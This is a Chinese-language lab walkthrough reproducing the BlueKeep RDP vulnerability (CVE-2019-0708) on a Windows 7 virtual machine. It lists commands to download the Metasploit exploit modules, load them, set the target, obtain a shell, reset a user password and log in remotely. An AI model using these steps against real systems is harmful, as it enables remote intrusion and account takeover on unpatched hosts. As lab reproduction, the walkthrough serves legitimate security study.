CVE-2019-0708漏洞复现

CVE-2019-0708漏洞复现

  • CVE-2019-0708背景
    • 影响系统
    • 测试环境
    • 更新kali linux
    • 更新msf
    • 下载cve_2019_0708模块
    • 查看msf安装的路径
    • 拷贝模块
    • 漏洞复现
    • 远程登陆
        • 更改用户密码,并进行远程登陆。
        • 登陆

CVE-2019-0708背景

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。
CVE-2019-0708这个漏洞最早爆出是在今年5月份,不过当时这个漏洞POC只能使得目标主机蓝屏,在前一段时间爆出来可以反弹shell的exp,下面我来演示复现一下。

影响系统

开启了3389端口。

  1. windows2003;
  2. windows2008;
  3. windows2008 R2;
  4. windows xp;
  5. windows 7;

测试环境

使用VM安装Windows7 x64SP1模拟受害机
vm虚拟机安装的时候默认是家庭版的,所以在安装的时候要选择一下。
CVE-2019-0708漏洞复现_第1张图片
在计算机右键-属性-远程设置-允许…
CVE-2019-0708漏洞复现_第2张图片
在cmd确认是否开启3389端口
CVE-2019-0708漏洞复现_第3张图片

更新kali linux

apt-getupdate & apt-get upgrade
apt-get dist-upgrade

更新msf

参考:https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

下载cve_2019_0708模块

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

查看msf安装的路径

find / -name 'metasploit'

CVE-2019-0708漏洞复现_第4张图片

拷贝模块

下载下来后,直接复制到对应的路径。
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/

如果这里没有rdp目录,就用mkdir命令创建一个rdp目录
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/rdp/
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/

漏洞复现

1.启动msf
CVE-2019-0708漏洞复现_第5张图片
2.使用reload_all重新加载模块
在这里插入图片描述
3.use exploit/rdp/cve_2019_0708_bluekeep_rce
CVE-2019-0708漏洞复现_第6张图片
4.主要设置的参数有RHOSTS / target

  • RHOSTS 目标机ip
  • target ID数字(可选为0-4)设置受害机机器架构
Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

CVE-2019-0708漏洞复现_第7张图片
失败了好几次,有几次出现蓝屏,最后还是可以了~
CVE-2019-0708漏洞复现_第8张图片CVE-2019-0708漏洞复现_第9张图片CVE-2019-0708漏洞复现_第10张图片
在首选项修改兼容gb2312
在这里插入图片描述

远程登陆

更改用户密码,并进行远程登陆。

登陆

CVE-2019-0708漏洞复现_第11张图片
CVE-2019-0708漏洞复现_第12张图片

你可能感兴趣的:(漏洞复现)